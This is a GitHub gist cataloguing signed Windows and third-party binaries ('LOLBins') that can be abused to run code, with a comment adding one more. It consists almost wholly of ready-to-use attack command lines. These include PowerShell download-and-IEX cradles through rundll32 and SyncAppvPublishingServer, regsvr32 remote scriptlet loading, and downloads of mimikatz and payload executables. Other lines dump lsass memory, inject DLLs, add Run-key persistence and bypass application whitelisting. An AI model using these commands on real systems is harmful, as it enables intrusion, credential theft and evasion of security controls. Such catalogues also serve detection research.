Skip to content

Instantly share code, notes, and snippets.

@api0cradle
Last active May 21, 2023 17:28
Show Gist options
  • Save api0cradle/8cdc53e2a80de079709d28a2d96458c2 to your computer and use it in GitHub Desktop.
Save api0cradle/8cdc53e2a80de079709d28a2d96458c2 to your computer and use it in GitHub Desktop.
BinariesThatDoesOtherStuff
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
sqldumper 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
SQLPS.exe
Powershell host
https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
#Intel
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe" - https://twitter.com/egre55/status/1093821740298448896
iAutorun.exe (Intel Pro Wireless software)
Put in autorun.inf:
XP_APPS_32=c:\windows\system32\notepad.exe
XP_APPS_64=c:\windows\system32\notepad.exe
VISTA_APPS_32=c:\windows\system32\notepad.exe
VISTA_APPS_64=c:\windows\system32\notepad.exe
WIN7_APPS_32=c:\windows\system32\notepad.exe
WIN7_APPS_64=c:\windows\system32\notepad.exe
WIN8_APPS_32=c:\windows\system32\notepad.exe
WIN8_APPS_64=c:\windows\system32\notepad.exe
WINPLUS_APPS_32=c:\windows\system32\notepad.exe
WINPLUS_APPS_64=c:\windows\system32\notepad.exe
RUNMODE=WAIT
http://www.hexacorn.com/blog/2019/08/20/sitting-on-the-lolbins-2/
LaunchDelay.exe notepad.exe 5
Sample: 775DBEC29C3558A61CCFFDBA6E319E4BCF2C5C2EA91C6F5AF04E88C699B7D7A8
http://www.hexacorn.com/blog/2019/08/22/sitting-on-the-lolbins-3/
#Acer
RunCmd_x64.exe C:\windows\system32\calc.exe
https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
#Plex
plexscripthost.exe #Pythonscript engine
https://twitter.com/Oddvarmoe/status/1092230434786869249
#Splunk
%USERPROFILE%\AppData\Local\slack\update.exe --processStart "test.exe"
https://twitter.com/Hexacorn/status/1108429585602019328
#notepad++
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
#Lotus notes
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes
#Citrix
C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Execute calc.exe through DefaultInstall Section Directive in INF file.
#Tanium
Tpowershell.exe
https://twitter.com/Hexacorn/status/1108288002193805312
#Nvidia GeForce Experience
courgette.exe -dis c:\temp\Autoruns.exe c:\temp\autoruns.asm
courgette.exe -asm c:\temp\autoruns.asm c:\temp\compiled\autorunsfromasm.exe
https://twitter.com/Oddvarmoe/status/1123249551756935169
#Avast
aswRunDll.exe c:\temp\myDll.dll
https://twitter.com/pabraeken/status/1000806146805059585
#Valve
C:\program files(x86)\Steam> writeminidump.exe <PID> C:\outfolder\outfile.dmp
https://twitter.com/pabraeken/status/1000507477329432586
#Pubg Lite
C:\Program Files (x86)\PUBGLite\Client\ucldr_bgl_se.exe mimikatz.exe
https://twitter.com/_felamos/status/1148166305129758720?s=21
#HP Printer drivers
c:\Program Files\HP\<model>\
\Bin\<model>.exe
\Bin\HPCustParticUI.exe
\Bin\hpqDTSS.exe
\Bin\InstanceFinderDlg.exe
\Bin\ScanToPCActivationApp.exe
\Bin\Toolbox.exe
<binary>.exe -uiDll c:\Test\test.dll
Also possible but needs more arguments:
\Bin\DigitalWizards.exe
\Bin\FaxApplications.exe
\Bin\HPRewards.exe
http://www.hexacorn.com/blog/2019/08/19/sitting-on-the-lolbins-1/
ZOHO Corporation private Limited
dctask64.exe injectDll <dllpath> <PID>
dctask64.exe invokeexe <executable>
https://twitter.com/gN3mes1s/status/1222088214581825540
Avira Antivirus
type cmd.txt | Avira.PWM.NativeMessaging.exe - In bat file
https://medium.com/@knikolenko/avira-free-antivirus-password-collector-83452fa7f943
https://twitter.com/malwrhunterteam/status/1258346778421846017
#Cisco Jabber
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#processdump-exe-from-cisco-jabber
https://twitter.com/spotheplanet/status/1310606426172162050
#Discord
discordhookhelper64.exe inject DiscordHook64.dll 0 3785
https://twitter.com/Blackmond_/status/1317035680682397701
#Symantec
https://twitter.com/nas_bench/status/1385599433333686278
#Spotify
https://twitter.com/Hexacorn/status/1412517463892414469
SpotifySetup.exe --url <url>
Other options
--mu ..\..\..\..\..\..\..\..\test\ downloads that file to c:\test\SpWebInst0.exe and launches from there -- silent - quieter, but mini-GUI still shows up
@fsacer
Copy link

fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment